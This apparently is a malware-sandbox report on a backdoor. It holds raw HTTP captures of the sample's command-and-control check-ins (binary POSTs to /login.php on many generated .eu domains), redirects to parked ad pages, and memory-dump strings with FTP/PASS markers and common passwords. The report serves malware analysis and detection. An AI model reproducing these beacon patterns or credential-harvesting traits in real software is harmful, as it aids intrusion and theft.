Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu

Location: hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6

3e..Go hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: novomyfexij.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:06 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.novomyfexij.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:06 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.novomyfexij.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/nopegymozow.eu

Set-Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.ganycyhywek.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:32 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f3..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>ganycyhywek.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'ganycyhywek.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0OC40MjE6NWRiY2I0OWIyZGRkYzIzYmJlY2FiNzExYThkOGRmODhlZTY5NTUxMzNhZTM5OWQzYWMyZjg0YzFiMDBiMjU1ZTo1NjRlZTMzNDY2Y2Rk';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMzNDY1MjY5fHx8MTQ0ODAxMDU0OC40MjQ5fGJlZDNjY2NlYjNkY2Q1MGY1Y2NhODlmZmE0ZDc5ZWMxYmEzN2JlMDZ8fHx8fDF8fHwwfDU2NGVlMzM0OGFiZjgyYjI0MzhiNjA5ZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "hXXp://qui

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/kemocujufys.eu

Set-Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qeqinuqypoq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/qeqinuqypoq.eu

Set-Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET /domain/marytymenok.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu

Location: hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960

3e..Go hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jeluganusog.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.jeluganusog.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.jeluganusog.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.mamixikusah.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=902vr1955561446822064; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.mamixikusah.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=64

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.mamixikusah.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.mamixikusah.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.mamixikusah.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysovidacyx.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: masawocipel.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:11 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.masawocipel.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.masawocipel.eu..Vary: Accept-Encoding..

GET /domain/gatedyhavyd.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu

Location: hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81

3e..Go hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.jeluganusog.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:07 GMT

Server: Apache

Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=51

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.jeluganusog.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.jeluganusog.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.jeluganusog.eu&_cfrg=1&_driHTTP/1.1 200 OK..Date: Fri, 20 Nov 2015 09:09:07 GMT..Server: Apache..Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly..X-Frame-Options: DENY..X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==..Vary: Accept-Encoding,User-Agent..Content-Length: 1686..Keep-Alive: timeout=5, max=51..Connection: Keep-Alive..Content-Type: text/html; charse

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganycyhywek.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:38 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.ganycyhywek.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:38 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.ganycyhywek.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.masawocipel.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:43 GMT

Server: Apache

Set-Cookie: vsid=919vr1955561836832705; expires=Wed, 18-Nov-2020 09:09:43 GMT; path=/; domain=ww92.masawocipel.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=58

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.masawocipel.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.masawocipel.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.masawocipel.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

GET /d1e2832667be3ac8af2587e3c0958424 HTTP/1.1

Host: xsso.tucyguqaciq.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu

19..Landed tucyguqaciq.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.ryleryqacic.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:04 GMT

Server: Apache

Set-Cookie: vsid=916vr1955561446614594; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.ryleryqacic.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=109

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.ryleryqacic.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.ryleryqacic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.ryleryqacic.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/gatedyhavyd.eu

Set-Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:52 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.xuqufyduras.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.xuqufyduras.eu..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:55 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.xuqufyduras.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.xuqufyduras.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.novomyfexij.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:36 GMT

Server: Apache

Set-Cookie: vsid=914vr1955561764501275; expires=Wed, 18-Nov-2020 09:09:36 GMT; path=/; domain=ww92.novomyfexij.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=96

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.novomyfexij.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.novomyfexij.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

Explorer.EXE_1572_rwx_01EA0000_000B2000:

.text

.text

`.data

`.data

.reloc

.reloc

`.rdata

`.rdata

@.data

@.data

http

http

PASSu98V

PASSu98V

PASSu08V

PASSu08V

FTPQ

FTPQ

12345678

12345678

password1

password1

monkey

monkey

